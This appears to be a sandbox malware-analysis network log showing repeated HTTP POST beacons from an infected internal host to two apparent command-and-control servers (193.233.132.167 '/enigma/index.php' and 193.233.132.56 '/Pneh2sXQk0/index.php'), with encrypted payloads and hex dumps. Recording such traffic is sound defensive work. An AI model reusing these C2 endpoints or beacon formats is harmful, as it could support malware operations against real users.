                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.382359982 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1323192.168.2.551177193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.275702953 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.525648117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1324192.168.2.551178193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.736181021 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.985179901 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1325192.168.2.551179193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:03.867253065 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.110099077 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1326192.168.2.551180193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.232568979 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.480467081 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1327192.168.2.551181193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.354208946 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.599560022 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1328192.168.2.551182193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.815279961 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.059890985 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1329192.168.2.551183193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:04.941760063 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.185753107 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1330192.168.2.551184193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.314809084 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.571484089 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1331192.168.2.551185193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.439419985 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.692621946 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1332192.168.2.551186193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:05.910593033 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.157146931 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1333192.168.2.551187193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.038501024 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.285661936 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1334192.168.2.551188193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.411046028 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.666073084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1335192.168.2.551189193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.539952993 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:06.795605898 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1336192.168.2.551190193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.005722046 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.249983072 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1337192.168.2.551191193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.149180889 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.396560907 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1338192.168.2.551192193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.502878904 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.757133961 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1339192.168.2.551193193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:07.646423101 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
